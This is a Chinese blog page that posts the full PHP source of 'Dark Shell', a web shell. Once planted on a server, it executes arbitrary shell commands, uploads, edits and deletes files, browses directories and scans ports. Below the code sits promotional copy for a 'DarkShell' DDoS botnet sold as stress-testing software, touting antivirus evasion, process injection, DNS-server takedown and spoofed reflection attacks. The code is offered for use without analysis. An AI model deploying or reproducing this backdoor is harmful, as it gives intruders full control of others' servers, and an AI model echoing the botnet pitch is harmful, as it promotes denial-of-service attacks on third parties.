php源码 - darkshell

<html>
<head>
<title>
Dark Shell
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
error_reporting (0);
set_time_limit (0);
if (empty ($_GET ['dir'])){
$dir = getcwd ();
}
else {
$dir = $_GET ['dir'];
}
chdir ($dir);
$current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);

echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>\n";
echo "Current directory: " . getcwd () . "<br>\n";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
echo "<pre>\n\n\n</pre>";

echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = '".$current."&mode=system'>Shell Command</a></td>\n";
echo "<td><a href = '".$current."&mode=create'>Create a new file</a></td>\n";
echo "<td><a href = '".$current."&mode=upload'>Upload file</a></td>\n";
echo "<td><a href = '".$current."&mode=port_scan'>Port Scan</a></td>\n";
echo "</tr></table>";
echo "<pre>\n\n</pre>";



$mode = $_GET ['mode'];
switch ($mode){
case 'edit':
$file = $_GET ['file'];
$new = $_POST ['new'];
if (empty ($new)){
$fp = fopen ($file, "r");
$file_cont = fread ($fp, filesize ($file));
$file_cont = str_replace ("</textarea>", "<textarea>", $file_cont);
echo "<form action = '".$current."&mode=edit&file=".$file."' method = 'POST'>\n";
echo "File: ". $file . "<br>\n";
echo "<textarea name = 'new' rows = '30' cols = '50'>".$file_cont."</textarea><br>\n";
echo "<input type = 'submit' value = 'Edit'></form>\n";
}
else {
$fp = fopen ($file, "w");
if (fwrite ($fp, $new)){
echo $file . " edited.<p>";
}
else {
echo "Unable to edit " . $file . ".<p>";
}
}
fclose ($fp);
break;
case 'delete':
$file = $_GET ['file'];
if (unlink ($file)){
echo $file . " deleted successfully.<p>";
}
else {
echo "Unable to delete " . $file . ".<p>";
}
break;
case 'copy':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)){
echo "<form action = '".$current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
}
else {
if (copy ($src, $dst)){
echo "File copied successfully.<p>\n";
}
else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
case 'move':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)){
echo "<form action = '".$current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
}
else {
if (rename ($src, $dst)){
echo "File moved successfully.<p>\n";
}
else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
case 'rename':
$old = $_GET ['old'];
$new = $_POST ['new'];
if (empty ($new)){
echo "<form action = '".$current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
}
else {
if (rename ($old, $new)){
echo "File/Directory renamed successfully.<p>\n";
}
else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;

case 'rmdir':
$rm = $_GET ['rm'];
if (rmdir ($rm)){
echo "Directory removed successfully.<p>\n";
}
else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
case 'system':
$cmd = $_POST ['cmd'];
if (empty ($cmd)){
echo "<form action = '".$current . "&mode=system' method = 'POST'>\n";
echo "Shell Command: <input name = 'cmd'>\n";
echo "<input type = 'submit' value = 'Run'></form><p>\n";
}
else {
system ($cmd);
}
break;
case 'create':
$new = $_POST ['new'];
if (empty ($new)){
echo "<form action = '".$current . "&mode=create' method = 'POST'>\n";
echo "<tr><td>New file: <input name = 'new'></td>\n";
echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
}
else {
if ($fp = fopen ($new, "w")){
echo "File created successfully.<p>\n";
}
else {
echo "Unable to create ".$file.".<p>\n";
}
fclose ($fp);
}
break;
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (empty ($file)){
echo "<form action = '".$current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>\n";
echo "<input type = 'submit' value = 'Upload'>\n";
echo "</form>\n<pre>\n\n</pre>";
}
else {
if(move_uploaded_file($temp,$file)){
echo "File uploaded successfully.<p>\n";
unlink ($temp);
}
else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;

case 'port_scan':
$port_range = $_POST ['port_range'];
if (empty ($port_range)){
echo "<table><form action = '".$current. "&mode=port_scan' method = 'POST'>";
echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
}
else {
$range = explode (":", $port_range);
if ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){
echo "Bad parameters.<br>";
}
else {
$host = 'localhost';
$from = $range [0];
$to = $range [1];
echo "Open ports:<br>";
while ($from <= $to){
$var = 0;
$fp = fsockopen ($host, $from) or $var = 1;
if ($var == 0){
echo $from . "<br>";
}
$from++;
fclose ($fp);
}
}
}
break;


}

clearstatcache ();

echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir ($dir);
foreach ($files as $file){
if (is_file ($file)){

$size = round (filesize ($file) / 1024, 2);
echo "<tr><td>".$file."</td>";
echo "<td>".$size." KB</td>";
echo "<td><a href = ".$current . "&mode=edit&file=".$file.">Edit</a></td>\n";
echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>\n";
echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>\n";
echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>\n";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>\n";
}
else {
$items = scandir ($file);
$items_num = count ($items) - 2;
echo "<tr><td>".$file."</td>";
echo "<td>".$items_num." Items</td>";
echo "<td><a href = ".$current . "/" . $file.">Change directory</a></td>\n";
echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>\n";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>\n";
}
}
echo "</table>\n";
?>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Welcome to DarkShell.DDOS website     DarkShell((DDOS)集群防火墙压力测试系统)是一款由DarkShell工作室独立开发的标准的网络压力测试软件、集DDOS、WEB、ISS连接测试于一身的集群压力测试软件,可广泛应用于机房、路由、软、硬件防火墙测试,机房带宽测试,服务器负载上限测试,WEB应用测试等,具有相当的产品特性,涵盖了各种同类产品软件的功能有过而无不及,该软件来自IT技术界一流的DarkShell工作室开发,是专门针对大众化设计研发的具有创新思想和专有技术的新型网络压力测试软件。集合了市面上所有压力测试软件的优点,取得了革命性突破。可让您面对各种安全威胁防范于未然.稳操胜券! 服务端的特性:     IOCP完成端口、兼容和稳定性优越、占用CPU和内存资源极少、启动方式多样、无壳20K体积、防误报能力强等,压缩后10K体积更诱人。服务端纯SDK打造,无MFC类,体积小巧,方便免杀,采用Shell Code特殊方式注入,无DLL穿越防火墙自动探测系统是否支持raw发包 提升攻击效率30%,注册服务启动,安全稳定。客户端使用IOCP完成端口上线,无上线限制,具有高效率,高发包率,不死锁等特点。支持插入SVCHOST/IE浏览器/EXP等多种进程,无DLL完全穿透防火墙,安装杀软无提示,隐蔽性极强,特征码少,免杀更方便。 自由上线模式:     专用上线、FTP上线、动态域名上线等方式完全让用户自由选择,无任何限制!HTTP上线域名后缀名可以是任意文件名和后缀名。 压力测试功能:     常规模式(SYN、UDP、TCP、ACK、IGMP、ICMP、DNS、M2游戏引擎)、WEB模式(Get协议、变异CC、无限CC、分布式循环CC、循环下载)、破防模式、游戏服务器测试模式等,以及强大的自定义模式.支持16进制于ASCII码互转。支持多模式同时进行压力测试,独有的UDP攻击,采用新型的内核技术,发送数据包不经过缓存区直接对目标发送,且仅占CPU%5左右,自动探测系统是否支持raw发包提升攻击效率30%,安全稳攻击速度一流。为企业IDC提高自身防护做到最高效率。 集群压力测试: 集群管理在线主机,给在线主机指派指定任务,可针对目标IP进行集群攻击,单独目标攻击,循环遍历目标攻击,自动循环遍历查找有效攻击数据包,专门针对高防特防机房进行压力测试,威力强大,用前请谨慎。 DNS压力测试: DNS专用测试模式,可针对单独独立域名DNS进行压力测试,以达到删除指定域名目的,也可选择针对整台DNS服务器进行压力测试,最终导致DNS服务器瘫痪,无法解析域名。 反射压力测试: 利用之前的drdos,经过反复测试,优化,利用百度,谷歌等大型企业服务网络进行欺诈,伪造源地址,让其它大型企业的服务网络进行对目标的IP地址进行大流量攻击,达到秒杀目标服务器IP的目的。 传奇假人攻击: 穿破目前一切防假人攻击脚本,利用最新技术,进行M2引擎注册假人上线,耗尽服务器资源,达到封杀目的。 Linux优势: 免费版本只支持路由内核、Ubuntu、admin等,独立开发的Linux穿盾CC模式,SYN稳定发包100%,无自启动,需Root权限发包。 批量操作功能:     同时对多台被控制端进行远程批量下载,批量关机,批量重启,批量打开指定网页等功能操作。被控制端自动更新、当发送此命令时,被控制端会自动到控制台下载新的被控制端程序,更新自己。主机暂借功能、可以把自己的在线被控端暂时借给好友,当被控端重起后被控端则自动转换回您之前的上线地址,可保证暂借后的被控端不会有借无还.自动返还。 VIP版本功能: VIP版本的功能包含所有免费版本的功能,VIP版本与免费版本不是同一个iocp,VIP版本的iocp更稳定更快速。 Linux优势: Linux支持路由内核、2.6、3.1等普通内核,路由内核支持路由三大内核、Ubuntu、admin等,独立开发的Linux穿盾CC模式,SYN稳定发包100%,自启动,无需Root权限上线即可发包。 VIP版本攻击代码实时更新,通过服务器获取最新攻击代码,无需更换服务端即可享受最新攻击代码的优势,云端DDOS,云数据,云获取,云攻击,云更新,开辟新业界篇章,经典在继续。 2014经典力作,DarkShell一切攻击数据包均从云端获取,例如对指定服务器IP发送数据无效时,服务端会从云端读取另一段数据包,对其目标发送,如果有效,则进行大规模DDOS压力测试,如若无效则继续遍历数据包,查找相应数据进行发送,任何高防机器将被秒杀,独家绕过杀软,如被杀,服务端将自动从云端获取最新数据进行自身升级更新,省去更新免杀时用户需要自行批量更新的繁琐。 客服售后服务:     远程辅助,简单操作、灵活运用智能自动更新、24小时在线客服,接受任何反馈建议并及时采纳.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值